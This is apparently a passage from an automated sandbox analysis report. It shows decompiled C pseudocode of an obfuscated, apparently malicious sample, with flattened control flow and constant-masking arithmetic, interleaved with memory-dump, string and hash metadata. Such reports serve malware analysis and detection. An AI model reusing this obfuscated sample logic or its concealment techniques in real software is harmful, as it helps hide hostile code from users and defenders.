                                              				_v164 = _v164 + 0xf341;
                                              				_v164 = _v164 >> 0xb;
                                              				_v164 = _v164 ^ 0x00001a6d;
                                              				_v104 = 0x25ae;
                                              				_v104 = _v104 ^ 0xe14689b4;
                                              				_v104 = _v104 ^ 0x501c8677;
                                              				_v104 = _v104 ^ 0xb15a3e2e;
                                              				_v100 = 0xf2b8;
                                              				_v100 = _v100 >> 4;
                                              				_v100 = _v100 + 0x7f8b;
                                              				_v100 = _v100 ^ 0x0000c2a8;
                                              				_v64 = 0x78fc;
                                              				_t426 = 0x2a;
                                              				_v64 = _v64 / _t426;
                                              				_v64 = _v64 ^ 0x000003c6;
                                              				_v28 = 0x315;
                                              				_v28 = _v28 | 0x8467cf1c;
                                              				_v28 = _v28 ^ 0x84678c6c;
                                              				_v36 = 0x48e3;
                                              				_v36 = _v36 << 0x10;
                                              				_v36 = _v36 ^ 0x48e34564;
                                              				_v140 = 0xd9da;
                                              				_v140 = _v140 ^ 0xccfa4b87;
                                              				_v140 = _v140 >> 8;
                                              				_v140 = _v140 + 0xb0ba;
                                              				_v140 = _v140 ^ 0x00cde1b8;
                                              				_v44 = 0xbd19;
                                              				_v44 = _v44 >> 0xc;
                                              				_v44 = _v44 ^ 0x000065c0;
                                              				_v136 = 0xd203;
                                              				_v136 = _v136 | 0x5349dfd2;
                                              				_v136 = _v136 + 0xffffa76d;
                                              				_v136 = _v136 ^ 0xc21cb162;
                                              				_v136 = _v136 ^ 0x91553623;
                                              				_v24 = 0x8da7;
                                              				_v24 = _v24 + 0xffff55dc;
                                              				_v24 = _v24 ^ 0xffffe382;
                                              				_v68 = 0xcfb5;
                                              				_t427 = 0x28;
                                              				_v68 = _v68 / _t427;
                                              				_v68 = _v68 ^ 0x00000530;
                                              				_t428 = _v12;
                                              				_t357 = _v132;
                                              				while(1) {
                                              					L1:
                                              					while(1) {
                                              						_t439 = _t431 - 0x28e290b2;
                                              						if(_t439 > 0) {
                                              							goto L18;
                                              						}
                                              						L3:
                                              						if(_t439 == 0) {
                                              							_t386 = _t379;
                                              							_t365 = E0023A970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
                                              							_t437 =  &(_t437[0xf]);
                                              							if(_t365 == 0) {
                                              								L24:
                                              								_t431 = 0x1c1c4d3a;
                                              								goto L11;
                                              							} else {
                                              								_t368 = E00238C8F(_t386);
                                              								_t431 = 0x30519b83;
                                              								_t357 = _v12 * 0x2c + _t379;
                                              								_v132 = _t357;
                                              								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
                                              								goto L12;
                                              							}
                                              							L34:
                                              						} else {
                                              							if(_t431 == _t413) {
                                              								E002394DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
                                              								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
                                              								_t357 = E00225FB2(_v56, _v108, _v16);
                                              								_t437 =  &(_t437[8]);
                                              								L29:
                                              								_t380 = _v148;
                                              								_t413 = 0x10c975df;
                                              								goto L30;
                                              							} else {
                                              								if(_t431 == 0x1c1c4d3a) {
                                              									E0022F536(_v100, _v64, _v28, _t435);
                                              									_t431 = 0x205a5796;
                                              									goto L11;
                                              								} else {
                                              									if(_t431 == 0x205a5796) {
                                              										return E0022F536(_v36, _v140, _v44, _t379);
                                              									}
                                              									if(_t431 == 0x221cfa57) {
                                              										_t428 = _t428 + 0x2c;
                                              										asm("sbb esi, esi");
                                              										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
                                              										continue;
                                              									} else {
                                              										if(_t431 != 0x2413af03) {
                                              											L30:
                                              											if(_t431 != 0x1b07e5ae) {
                                              												_t357 = _v132;
                                              												while(1) {
                                              													_t439 = _t431 - 0x28e290b2;
                                              													if(_t439 > 0) {
                                              														goto L18;
                                              													}
                                              													goto L3;
                                              												}
                                              												goto L18;
                                              											}
                                              										} else {
                                              											_push(_t380);
                                              											_push(_t380);
                                              											_t357 = E00228736(0x20000); // executed
                                              											_t379 = _t357;
                                              											if(_t379 != 0) {
                                              												_t431 = 0x2c9da08a;
                                              												L11:
                                              												_t357 = _v132;
                                              												L12:
                                              												_t380 = _v148;
                                              												goto L1;
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L33:
                                              						return _t357;
                                              						goto L34;
                                              						L18:
                                              						if(_t431 == 0x2c9da08a) {
                                              							_push(_t380);
                                              							_push(_t380);
                                              							_t357 = E00228736(0x2000);
                                              							_t435 = _t357;
                                              							if(_t357 == 0) {
                                              								_t431 = 0x205a5796;
                                              								goto L29;
                                              							} else {
                                              								_t431 = 0x28e290b2;
                                              								goto L11;
                                              							}
                                              						} else {
                                              							if(_t431 == 0x30519b83) {
                                              								_t361 = E0022F65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88); // executed
                                              								_t380 = _v148;
                                              								_t437 =  &(_t437[5]);
                                              								_v16 = _t361;
                                              								_t357 = _v132;
                                              								_t413 = 0x10c975df;
                                              								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
                                              								continue;
                                              							} else {
                                              								if(_t431 == 0x33392e52) {
                                              									E00237830(_v128, _t380, _t435, _v164, _v104, _v24);
                                              									_t437 =  &(_t437[4]);
                                              									goto L24;
                                              								} else {
                                              									if(_t431 != 0x3b64c246) {
                                              										goto L30;
                                              									} else {
                                              										_t431 = 0x2413af03;
                                              										continue;
                                              									}
                                              								}
                                              							}
                                              						}
                                              						goto L33;
                                              					}
                                              				}
                                              			}


































































                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: +^$R.93$R.93$RESCDIR$dEH$l)
                                              • API String ID: 0-1973027218
                                              • Opcode ID: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                              • Instruction ID: a7a8737c1f04335abbcc317f846f63b155e8dbe4f1ae4459d29ac5cac7992b65
                                              • Opcode Fuzzy Hash: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                              • Instruction Fuzzy Hash: E80243B25083819FE368DF64C48AA5BFBE1FBC4314F108A1DE5D996260D7B49949CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E002302C3() {
                                              				char _v524;
                                              				intOrPtr _v548;
                                              				char _v564;
                                              				intOrPtr _v568;
                                              				intOrPtr _v572;
                                              				intOrPtr _v576;
                                              				intOrPtr _v580;
                                              				intOrPtr _v584;
                                              				char _v588;
                                              				signed int _v592;
                                              				signed int _v596;
                                              				signed int _v600;
                                              				signed int _v604;
                                              				signed int _v608;
                                              				signed int _v612;
                                              				signed int _v616;
                                              				signed int _v620;
                                              				signed int _v624;
                                              				signed int _v628;
                                              				signed int _v632;
                                              				signed int _v636;
                                              				signed int _v640;
                                              				signed int _v644;
                                              				signed int _v648;
                                              				signed int _v652;
                                              				signed int _v656;
                                              				signed int _v660;
                                              				signed int _v664;
                                              				signed int _v668;
                                              				signed int _v672;
                                              				signed int _v676;
                                              				signed int _t245;
                                              				signed int _t247;
                                              				void* _t249;
                                              				signed int _t254;
                                              				void* _t255;
                                              				intOrPtr _t256;
                                              				signed int _t258;
                                              				signed int _t259;
                                              				signed int _t260;
                                              				signed int _t261;
                                              				signed int _t262;
                                              				signed int _t263;
                                              				signed int _t264;
                                              				signed int _t265;
                                              				signed int _t266;
                                              				signed int _t267;
                                              				signed int _t290;
                                              				void* _t293;
                                              				void* _t298;
                                              				signed int* _t300;
                                              
                                              				_t300 =  &_v676;
                                              				_v580 = 0x66ae1;
                                              				_v576 = 0xbd1a2;
                                              				_v572 = 0x272c23;
                                              				_t258 = 0x33;
                                              				_t256 = 0;
                                              				_t293 = 0x3b419076;
                                              				_v568 = 0;
                                              				_v640 = 0x1372;
                                              				_v640 = _v640 / _t258;
                                              				_v640 = _v640 | 0x4a3401ed;
                                              				_v640 = _v640 ^ 0x4a34016d;
                                              				_v660 = 0x5e98;
                                              				_v660 = _v660 >> 0xe;
                                              				_v660 = _v660 | 0x7267fa90;
                                              				_t259 = 0x75;
                                              				_v660 = _v660 / _t259;
                                              				_v660 = _v660 ^ 0x00fa5318;
                                              				_v652 = 0x5e75;
                                              				_v652 = _v652 << 0x10;
                                              				_v652 = _v652 + 0x48dc;
                                              				_t260 = 0x18;
                                              				_v652 = _v652 / _t260;
                                              				_v652 = _v652 ^ 0x03efb4d1;
                                              				_v608 = 0xe223;
                                              				_t261 = 0x3f;
                                              				_v608 = _v608 / _t261;
                                              				_v608 = _v608 ^ 0x000070cc;
                                              				_v656 = 0xb48f;
                                              				_v656 = _v656 >> 6;
                                              				_t262 = 0x3a;
                                              				_v656 = _v656 / _t262;
                                              				_v656 = _v656 + 0xde3a;
                                              				_v656 = _v656 ^ 0x0000cbaf;
                                              				_v612 = 0x15cc;
                                              				_v612 = _v612 ^ 0x9ca6d169;
                                              				_v612 = _v612 ^ 0x9ca6af9c;
                                              				_v668 = 0xa8de;
                                              				_v668 = _v668 << 5;
                                              				_v668 = _v668 + 0xffff49ed;
                                              				_t263 = 0x34;
                                              				_v668 = _v668 / _t263;
                                              				_v668 = _v668 ^ 0x00000193;
                                              				_v596 = 0xe25b;
                                              				_v596 = _v596 >> 4;
                                              				_v596 = _v596 ^ 0x000030c3;
                                              				_v636 = 0xc7ea;
                                              				_v636 = _v636 << 0xa;
                                              				_v636 = _v636 | 0x82c54243;
                                              				_v636 = _v636 ^ 0x83dfaf9b;
                                              				_v620 = 0x2a3e;
                                              				_v620 = _v620 + 0xffff612f;
                                              				_v620 = _v620 ^ 0xffffe842;
                                              				_v644 = 0x52e;
                                              				_t264 = 0x44;
                                              				_v644 = _v644 * 0x2b;
                                              				_v644 = _v644 + 0x1b45;
                                              				_v644 = _v644 ^ 0x0000a38b;
                                              				_v664 = 0x7c05;
                                              				_v664 = _v664 / _t264;
                                              				_v664 = _v664 + 0xfffff3de;
                                              				_t265 = 0xd;
                                              				_v664 = _v664 * 0x41;
                                              				_v664 = _v664 ^ 0xfffd1fed;
                                              				_v672 = 0x7153;
                                              				_v672 = _v672 * 0x55;
                                              				_v672 = _v672 + 0xffff3073;
                                              				_v672 = _v672 | 0x19b2f735;
                                              				_v672 = _v672 ^ 0x19b69e67;
                                              				_v624 = 0x6a46;
                                              				_v624 = _v624 << 6;
                                              				_v624 = _v624 ^ 0x001a8e62;
                                              				_v676 = 0x6586;
                                              				_v676 = _v676 | 0x5a6bf539;
                                              				_v676 = _v676 / _t265;
                                              				_v676 = _v676 << 0xf;
                                              				_v676 = _v676 ^ 0x4e5fab63;
                                              				_v632 = 0x1a9f;
                                              				_v632 = _v632 + 0x62a3;
                                              				_v632 = _v632 ^ 0x000002a8;
                                              				_v616 = 0x8464;
                                              				_v616 = _v616 | 0x13bf265e;
                                              				_v616 = _v616 ^ 0x13bfdd6d;
                                              				_v592 = 0xbadb;
                                              				_t266 = 0x3d;
                                              				_t292 = _v632;
                                              				_v592 = _v592 * 0x69;
                                              				_v592 = _v592 ^ 0x004cce95;
                                              				_v604 = 0xca90;
                                              				_v604 = _v604 >> 0xc;
                                              				_v604 = _v604 ^ 0x00007684;
                                              				_v648 = 0x358b;
                                              				_v648 = _v648 << 1;
                                              				_v648 = _v648 << 9;
                                              				_v648 = _v648 / _t266;
                                              				_v648 = _v648 ^ 0x0003f328;
                                              				_v600 = 0xe7dd;
                                              				_v600 = _v600 ^ 0xaf509c9e;
                                              				_v600 = _v600 ^ 0xaf5010b9;
                                              				_v628 = 0xd224;
                                              				_t245 = _v628;
                                              				_t267 = 0x19;
                                              				_t290 = _t245 % _t267;
                                              				_v628 = _t245 / _t267;
                                              				_v628 = _v628 ^ 0x00000864;
                                              				do {
                                              					while(_t293 != 0x47bbe06) {
                                              						if(_t293 == 0xa25cde4) {
                                              							_t249 = E0022F46D();
                                              							_t298 = _v588 - _v548;
                                              							asm("sbb ecx, [esp+0x94]");
                                              							__eflags = _v584 - _t290;
                                              							if(__eflags >= 0) {
                                              								if(__eflags > 0) {
                                              									L19:
                                              									_t256 = 1;
                                              									__eflags = 1;
                                              								} else {
                                              									__eflags = _t298 - _t249;
                                              									if(_t298 >= _t249) {
                                              										goto L19;
                                              									}
                                              								}
                                              							}
                                              						} else {
                                              							if(_t293 == 0x13363d5d) {
                                              								_t290 = _v604;
                                              								_t267 = _v592;
                                              								E0023AAAE(_t267, _t290, _v648,  &_v588, _v600);
                                              								_t300 =  &(_t300[3]);
                                              								_t293 = 0xa25cde4;
                                              								continue;
                                              							} else {
                                              								if(_t293 == 0x1fdc46de) {
                                              									_t290 = _v660;
                                              									_t254 = E0022B566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
                                              									_t292 = _t254;
                                              									_t300 =  &(_t300[0xc]);
                                              									__eflags = _t254 - 0xffffffff;
                                              									if(__eflags != 0) {
                                              										_t293 = 0x47bbe06;
                                              										continue;
                                              									}
                                              								} else {
                                              									if(_t293 == 0x350fffd6) {
                                              										_t290 =  &_v524;
                                              										_t255 = E00233E3F(_t267, _t290, __eflags, _v652, _v608);
                                              										_pop(_t267);
                                              										__eflags = _t255;
                                              										if(__eflags != 0) {
                                              											_t293 = 0x1fdc46de;
                                              											continue;
                                              										}
                                              									} else {
                                              										if(_t293 != 0x3b419076) {
                                              											goto L14;
                                              										} else {
                                              											_t293 = 0x350fffd6;
                                              											continue;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L20:
                                              						return _t256;
                                              					}
                                              					_push(_t267);
                                              					_t247 = E00227F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
                                              					_t290 = _v616;
                                              					_t267 = _v632;
                                              					asm("sbb esi, esi");
                                              					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
                                              					__eflags = _t293;
                                              					E00234F7D(_t267, _t290, _t292); // executed
                                              					_t300 =  &(_t300[7]);
                                              					L14:
                                              					__eflags = _t293 - 0x2fc5a10a;
                                              				} while (__eflags != 0);
                                              				goto L20;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: #,'$#$Fj$Sq$[$u^
                                              • API String ID: 0-3347335214
                                              • Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                              • Instruction ID: 08c2adc5081c70fd22943ec9be5d578ceb2bcbdd8db8ce794acadef711dc749c
                                              • Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                              • Instruction Fuzzy Hash: 8FB142725083819FE358CF64C98A40BFBE2BBC4758F108A1DF195562A0D7B99A59CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E0022EE78() {
                                              				char _v520;
                                              				char _v1040;
                                              				intOrPtr _v1044;
                                              				intOrPtr _v1048;
                                              				intOrPtr _v1052;
                                              				intOrPtr _v1056;
                                              				signed int _v1060;
                                              				signed int _v1064;
                                              				signed int _v1068;
                                              				signed int _v1072;
                                              				signed int _v1076;
                                              				signed int _v1080;
                                              				signed int _v1084;
                                              				signed int _v1088;
                                              				signed int _v1092;
                                              				signed int _v1096;
                                              				signed int _v1100;
                                              				signed int _v1104;
                                              				signed int _v1108;
                                              				signed int _v1112;
                                              				signed int _v1116;
                                              				signed int _v1120;
                                              				signed int _v1124;
                                              				void* _t204;
                                              				void* _t216;
                                              				void* _t218;
                                              				intOrPtr _t242;
                                              				intOrPtr _t248;
                                              				signed int _t249;
                                              				signed int _t250;
                                              				signed int _t251;
                                              				signed int _t252;
                                              				signed int _t253;
                                              				signed int _t254;
                                              				signed int* _t257;
                                              
                                              				_t257 =  &_v1124;
                                              				_v1056 = 0x181c5d;
                                              				_v1052 = 0x367784;
                                              				_t216 = 0x1144238d;
                                              				_v1048 = 0x4ffcf6;
                                              				_t248 = 0;
                                              				_v1044 = 0;
                                              				_v1088 = 0xda27;
                                              				_t249 = 0x62;
                                              				_v1088 = _v1088 * 0x3a;
                                              				_t250 = 0x7a;
                                              				_v1088 = _v1088 / _t249;
                                              				_v1088 = _v1088 ^ 0x0000d2a1;
                                              				_v1112 = 0x1719;
                                              				_v1112 = _v1112 << 7;
                                              				_v1112 = _v1112 + 0xffff2bf1;
                                              				_v1112 = _v1112 | 0x98c770ba;
                                              				_v1112 = _v1112 ^ 0x98cfba04;
                                              				_v1096 = 0xeee5;
                                              				_v1096 = _v1096 ^ 0xe08a058d;
                                              				_v1096 = _v1096 | 0xf31efd60;
                                              				_v1096 = _v1096 >> 0xd;
                                              				_v1096 = _v1096 ^ 0x00079e87;
                                              				_v1068 = 0x925f;
                                              				_v1068 = _v1068 + 0xa627;
                                              				_v1068 = _v1068 * 0xc;
                                              				_v1068 = _v1068 ^ 0x000ee055;
                                              				_v1076 = 0x1457;
                                              				_v1076 = _v1076 * 0x3c;
                                              				_t251 = 0x32;
                                              				_v1076 = _v1076 / _t250;
                                              				_v1076 = _v1076 ^ 0x00007f2a;
                                              				_v1064 = 0x70c;
                                              				_v1064 = _v1064 * 3;
                                              				_v1064 = _v1064 ^ 0x000033a7;
                                              				_v1080 = 0xbf13;
                                              				_v1080 = _v1080 >> 0xf;
                                              				_v1080 = _v1080 | 0xa6e1d279;
                                              				_v1080 = _v1080 ^ 0xa6e18774;
                                              				_v1072 = 0x855;
                                              				_v1072 = _v1072 >> 6;
                                              				_v1072 = _v1072 * 0x6d;
                                              				_v1072 = _v1072 ^ 0x00004ced;
                                              				_v1060 = 0x8e6f;
                                              				_v1060 = _v1060 + 0xe76;
                                              				_v1060 = _v1060 ^ 0x0000eeed;
                                              				_v1116 = 0x7f13;
                                              				_v1116 = _v1116 + 0x7bf9;
                                              				_v1116 = _v1116 + 0xffffe522;
                                              				_v1116 = _v1116 + 0x76b9;
                                              				_v1116 = _v1116 ^ 0x000120a7;
                                              				_v1124 = 0x4a8d;
                                              				_v1124 = _v1124 + 0xb0fa;
                                              				_t252 = 0x18;
                                              				_v1124 = _v1124 / _t251;
                                              				_v1124 = _v1124 ^ 0xe1689f92;
                                              				_v1124 = _v1124 ^ 0xe168b829;
                                              				_v1104 = 0x6fdc;
                                              				_v1104 = _v1104 / _t252;
                                              				_v1104 = _v1104 ^ 0xd1a01b12;
                                              				_v1104 = _v1104 >> 0xd;
                                              				_v1104 = _v1104 ^ 0x0006b7bc;
                                              				_v1120 = 0x3441;
                                              				_v1120 = _v1120 << 2;
                                              				_v1120 = _v1120 | 0xb521b1d3;
                                              				_v1120 = _v1120 ^ 0x6f352f49;
                                              				_v1120 = _v1120 ^ 0xda14a570;
                                              				_v1092 = 0xdaef;
                                              				_v1092 = _v1092 + 0xffffef8f;
                                              				_v1092 = _v1092 | 0x558b4159;
                                              				_v1092 = _v1092 >> 0xb;
                                              				_v1092 = _v1092 ^ 0x000a96bc;
                                              				_v1084 = 0x9e65;
                                              				_v1084 = _v1084 ^ 0xd37ef8f9;
                                              				_t253 = 0x14;
                                              				_v1084 = _v1084 / _t253;
                                              				_v1084 = _v1084 ^ 0x0a9307fe;
                                              				_v1100 = 0x36e3;
                                              				_v1100 = _v1100 + 0xffff4219;
                                              				_v1100 = _v1100 | 0x679c7357;
                                              				_t254 = 0x3e;
                                              				_v1100 = _v1100 * 0x7e;
                                              				_v1100 = _v1100 ^ 0xffbf63c1;
                                              				_v1108 = 0x25e;
                                              				_v1108 = _v1108 / _t254;
                                              				_v1108 = _v1108 | 0x82073b90;
                                              				_v1108 = _v1108 * 0x30;
                                              				_v1108 = _v1108 ^ 0x615b4461;
                                              				do {
                                              					while(_t216 != 0x295ca1) {
                                              						if(_t216 == 0x1144238d) {
                                              							_t216 = 0x274f9b22;
                                              							continue;
                                              						} else {
                                              							if(_t216 == 0x1718f041) {
                                              								E0022C0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
                                              							} else {
                                              								if(_t216 == 0x274f9b22) {
                                              									E00233E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
                                              									_t216 = 0x295ca1;
                                              									continue;
                                              								} else {
                                              									_t264 = _t216 - 0x3691f983;
                                              									if(_t216 != 0x3691f983) {
                                              										goto L10;
                                              									} else {
                                              										_push( &_v1040);
                                              										_push( &_v520);
                                              										E00227B63(_v1104, _v1120, _t264);
                                              										_t248 =  !=  ? 1 : _t248;
                                              										_t216 = 0x1718f041;
                                              										continue;
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L13:
                                              						return _t248;
                                              					}
                                              					_push(_v1068);
                                              					_t204 = E0023889D(0x23c9b0, _v1096, __eflags);
                                              					_pop(_t218);
                                              					_t242 =  *0x23ca2c; // 0x4d8300
                                              					_t176 = _t242 + 0x230; // 0x700047
                                              					E0022C680(_t176, _v1064, _v1080, _t218, _v1072,  *0x23ca2c, _t204,  &_v1040);
                                              					E00232025(_v1060, _t204, _v1116, _v1124);
                                              					_t257 =  &(_t257[9]);
                                              					_t216 = 0x3691f983;
                                              					L10:
                                              					__eflags = _t216 - 0x16e30c37;
                                              				} while (__eflags != 0);
                                              				goto L13;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: I/5o$aD[a$6$L
                                              • API String ID: 0-1330720659
                                              • Opcode ID: 1b0bba7d448406666ede2745d443505c25697f1bccff73f4d904ca1d85d2cc10
                                              • Instruction ID: e37f493708a322a45e08cc5a683553eddc4a838e860a62783e813d87edb05022
                                              • Opcode Fuzzy Hash: 1b0bba7d448406666ede2745d443505c25697f1bccff73f4d904ca1d85d2cc10
                                              • Instruction Fuzzy Hash: 43914171118341EFD358CF65D48941BBBF6BBC4358F108A2EF19A96260C3B98A19CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E00227B63(void* __ecx, void* __edx, void* __eflags) {
                                              				void* _t227;
                                              				signed int _t253;
                                              				signed int _t257;
                                              				signed int _t258;
                                              				void* _t279;
                                              				void* _t280;
                                              
                                              				_t279 = _t280 - 0x70;
                                              				_push( *((intOrPtr*)(_t279 + 0x7c)));
                                              				_push( *((intOrPtr*)(_t279 + 0x78)));
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t227);
                                              				 *(_t279 + 0x5c) = 0x4f49;
                                              				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
                                              				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
                                              				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
                                              				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
                                              				 *(_t279 + 0x20) = 0x2d3b;
                                              				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
                                              				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
                                              				 *(_t279 + 0x38) = 0xada;
                                              				_t257 = 0x56;
                                              				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
                                              				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
                                              				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
                                              				 *(_t279 + 0x44) = 0x9fd0;
                                              				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
                                              				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
                                              				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
                                              				 *(_t279 + 0x28) = 0xbdd8;
                                              				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
                                              				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
                                              				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
                                              				 *(_t279 + 0x24) = 0xa469;
                                              				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
                                              				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
                                              				 *(_t279 + 0x48) = 0xdd17;
                                              				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
                                              				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
                                              				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
                                              				 *(_t279 + 0x3c) = 0x840;
                                              				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
                                              				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
                                              				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
                                              				 *(_t279 + 0x34) = 0xe245;
                                              				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
                                              				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
                                              				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
                                              				 *(_t279 + 0x68) = 0x7c59;
                                              				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
                                              				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
                                              				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
                                              				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
                                              				 *(_t279 + 0x1c) = 0x17b0;
                                              				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
                                              				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
                                              				 *(_t279 + 0xc) = 0x52de;
                                              				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
                                              				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
                                              				 *(_t279 + 0x14) = 0xa04a;
                                              				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
                                              				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
                                              				 *(_t279 + 0x10) = 0x88b9;
                                              				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
                                              				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
                                              				 *(_t279 + 0x58) = 0x8451;
                                              				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
                                              				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
                                              				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
                                              				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
                                              				 *(_t279 + 0x2c) = 0xa221;
                                              				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
                                              				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
                                              				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
                                              				 *(_t279 + 0x6c) = 0xb834;
                                              				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
                                              				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
                                              				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
                                              				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
                                              				 *(_t279 + 0x60) = 0x6d71;
                                              				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
                                              				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
                                              				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
                                              				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
                                              				 *(_t279 + 0x40) = 0xcc9d;
                                              				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
                                              				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
                                              				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
                                              				 *(_t279 + 0x50) = 0xea3;
                                              				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
                                              				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
                                              				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
                                              				 *(_t279 + 0x64) = 0xe156;
                                              				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
                                              				_t258 = 0x77;
                                              				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
                                              				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
                                              				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
                                              				 *(_t279 + 0x54) = 0xb949;
                                              				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
